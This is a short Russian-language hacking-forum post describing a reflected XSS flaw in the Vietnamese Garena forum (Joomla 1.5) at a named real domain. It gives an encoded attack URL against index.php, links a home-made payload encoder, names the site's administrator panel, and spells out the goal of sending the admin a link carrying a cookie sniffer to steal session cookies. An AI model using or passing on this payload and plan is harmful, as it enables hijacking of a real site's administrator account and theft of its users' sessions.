Пассивная XSS на вьетнамском форуме гарены. (Joomla 1.5 beta 3 от января 2010). Форум работает с обычными аккаунтами гарены.
----------
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
---------- Видео:
http://yehg.net/lab/pr0js/training/v...0_encoded-xss/
Пример:
http://garena.vn/index.php?option=co...%372%%374%%328
%%32f%%35a%%32e%%352%%361%%37a%%36f%%372%%320%%377 %%361%%373
%%320%%368%%365%%372%%365%%32f%%329%%33c%%32f%%373 %%363%%372%%369%%370%%374%%33e=oo
<Без переносов строки>
Поскольку енкодера не нашел вообще - написал свой:
http://www.sendspace.com/file/8qrg62
По факту - суем админу ссыль с закодированным сниффером и ловим куки...
админка тут: http://garena.vn/administrator/
Источник
http://www.zerverteam.com/id44